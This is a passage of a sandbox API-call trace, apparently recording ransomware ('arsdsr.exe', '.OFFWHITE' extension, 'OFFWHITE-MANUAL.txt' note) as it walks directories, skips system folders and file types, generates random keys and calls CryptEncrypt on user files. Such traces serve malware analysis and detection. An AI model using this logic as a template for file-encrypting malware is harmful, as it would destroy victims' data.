(lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.106] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0144.106] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.106] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.106] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.106] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.106] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.106] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.106] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.106] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.106] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.107] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.107] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.107] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.107] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.107] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.107] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.107] lstrcmpiW (lpString1="wmp.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.107] GetProcessHeap () returned 0x500000 [0144.107] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e8d0 [0144.107] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.107] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.107] GetProcessHeap () returned 0x500000 [0144.107] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eb38 [0144.107] GetProcessHeap () returned 0x500000 [0144.107] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eb50 [0144.107] GetProcessHeap () returned 0x500000 [0144.107] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55e7e0 [0144.107] GetProcessHeap () returned 0x500000 [0144.107] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55e8e8 [0144.108] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.108] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.108] SystemFunction036 (in: RandomBuffer=0x53eb38, RandomBufferLength=0x10 | out: RandomBuffer=0x53eb38) returned 1 [0144.108] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.108] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.108] SystemFunction036 (in: RandomBuffer=0x53eb50, RandomBufferLength=0x10 | out: RandomBuffer=0x53eb50) returned 1 [0144.108] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.108] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.108] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55e7e0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55e7e0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.108] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.108] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.108] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55e8e8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55e8e8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.109] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.109] SetLastError (dwErrCode=0x0) [0144.109] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55e7e0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.109] GetLastError () returned 0x6 [0144.109] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d64214, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d64214, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="wmp.ico", cAlternateFileName="")) returned 0 [0144.109] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0144.109] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2=".") returned 1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="..") returned 1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="...") returned 1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="windows") returned -1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="$recycle.bin") returned 1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="rsa") returned -1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="ntuser.dat") returned -1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="programdata") returned -1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="appdata") returned -1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="program files") returned -1 [0144.109] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="program files (x86)") returned -1 [0144.109] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\" [0144.109] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0144.109] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.110] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.110] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" [0144.110] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0144.112] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.113] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0144.113] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.113] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.113] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="en-US", cAlternateFileName="")) returned 1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="$recycle.bin") returned 1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="rsa") returned -1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="programdata") returned -1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="appdata") returned 1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="program files") returned -1 [0144.113] lstrcmpiW (lpString1="en-US", lpString2="program files (x86)") returned -1 [0144.114] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.114] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="en-US" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0144.114] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\" [0144.114] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\" [0144.114] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*" [0144.114] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb400b2, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0144.114] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.114] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb400b2, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0144.114] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.114] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.114] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0xb400b2, dwReserved1=0x295d670, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0144.114] lstrcmpiW (lpString1="resource.xml", lpString2=".") returned 1 [0144.114] lstrcmpiW (lpString1="resource.xml", lpString2="..") returned 1 [0144.114] lstrcmpiW (lpString1="resource.xml", lpString2="...") returned 1 [0144.114] lstrcmpiW (lpString1="resource.xml", lpString2="windows") returned -1 [0144.114] lstrcmpiW (lpString1="resource.xml", lpString2="$recycle.bin") returned 1 [0144.114] lstrcmpiW (lpString1="resource.xml", lpString2="rsa") returned -1 [0144.115] lstrcmpiW (lpString1="resource.xml", lpString2="ntuser.dat") returned 1 [0144.115] lstrcmpiW (lpString1="resource.xml", lpString2="programdata") returned 1 [0144.115] lstrcmpiW (lpString1="resource.xml", lpString2="appdata") returned 1 [0144.115] lstrcmpiW (lpString1="resource.xml", lpString2="program files") returned 1 [0144.115] lstrcmpiW (lpString1="resource.xml", lpString2="program files (x86)") returned 1 [0144.115] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\" [0144.115] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\", lpString2="resource.xml" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" [0144.115] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.115] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.115] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0144.115] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0144.115] lstrcmpiW (lpString1="resource.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.116] GetProcessHeap () returned 0x500000 [0144.116] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e8e0 [0144.116] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.118] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=-4251595836) returned 0 [0144.118] GetProcessHeap () returned 0x500000 [0144.118] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eb68 [0144.118] GetProcessHeap () returned 0x500000 [0144.118] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eb80 [0144.118] GetProcessHeap () returned 0x500000 [0144.118] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55e9f0 [0144.119] GetProcessHeap () returned 0x500000 [0144.119] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55eaf8 [0144.119] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.119] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.119] SystemFunction036 (in: RandomBuffer=0x53eb68, RandomBufferLength=0x10 | out: RandomBuffer=0x53eb68) returned 1 [0144.119] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.119] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.119] SystemFunction036 (in: RandomBuffer=0x53eb80, RandomBufferLength=0x10 | out: RandomBuffer=0x53eb80) returned 1 [0144.119] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.119] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.119] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55e9f0*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x55e9f0*, pdwDataLen=0x295c910*=0x100) returned 1 [0144.119] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.119] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.119] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55eaf8*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x55eaf8*, pdwDataLen=0x295c90c*=0x100) returned 1 [0144.120] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295cbc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.120] SetLastError (dwErrCode=0x0) [0144.120] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55e9f0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0) returned 0 [0144.120] GetLastError () returned 0x6 [0144.120] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0xb400b2, dwReserved1=0x295d670, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0144.120] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0144.120] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78a2eab, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2=".") returned 1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="..") returned 1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="...") returned 1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="windows") returned -1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="$recycle.bin") returned 1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="rsa") returned -1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="ntuser.dat") returned -1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="programdata") returned -1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="appdata") returned 1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="program files") returned -1 [0144.120] lstrcmpiW (lpString1="folder.ico", lpString2="program files (x86)") returned -1 [0144.120] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.121] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="folder.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" [0144.121] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.121] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.121] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.121] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.121] lstrcmpiW (lpString1="folder.ico", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.121] GetProcessHeap () returned 0x500000 [0144.121] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e8f0 [0144.121] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.122] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.122] 